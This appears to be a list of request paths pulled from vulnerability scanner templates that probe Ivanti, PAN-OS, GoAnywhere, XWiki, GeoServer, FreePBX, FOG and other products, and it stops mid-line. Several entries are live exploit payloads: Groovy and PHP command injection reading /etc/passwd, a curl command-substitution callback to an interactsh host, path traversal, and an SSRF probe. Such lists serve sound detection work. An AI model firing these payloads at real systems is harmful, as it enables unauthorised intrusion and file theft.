
/dana-na/auth/url_default/welcome.cgi
/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css
/dana-na/auth/url_6/welcome.cgi
/dana/home/index.cgi
/goanywhere/license/Unlicensed.xhtml/{{string}}?javax.faces.ViewState={{string}}&GARequestAction=activate
/license/Unlicensed.xhtml/{{string}}?javax.faces.ViewState={{string}}&GARequestAction=activate
/wp-json/mcp/v1
/query
/jsonpath
/api/query
/data
/parse
/filter
/expression
/nmc/rpc/log_getfile
/storage/filesvr.dn?t={{ticket}}
/posts?authorMatch={
/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20
/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20
/images/index.html?id=%24%7B%40print_r%28%40system%28%22{{command}}%22%29%29%7D
{{endpoints}}
/geoserver/wfs?service=WFS&request=GetCapabilities
/geoserver/ows?service=WFS&request=GetCapabilities
/wfs?service=WFS&request=GetCapabilities
/ows?service=WFS&request=GetCapabilities
/geoserver/wfs?service=WFS
/geoserver/ows?service=WFS
/wfs?service=WFS
/ows?service=WFS
/xwiki/rest/liveData/sources/liveTable/entries?sourceParams.template=getdeleteddocuments.vm&sort=injected
/mftp/
/
/misc/`curl${IFS}{{interactsh-url}}`/..;/index.html
/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app
{{js}}
/sse?transportType=stdio&command=echo&args[]=hello-from-brower
/webapi/ping
/pbxcore/files/cache/{{extracted_path}}?{{wait_for(3)}}
/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x
/fog/management/index.php?node=about&sub=kernel
/fog/service/getversion.php?url={{interactsh-url}}
/displays/nuclei_check.json
/{{trim_prefix(update_uri,
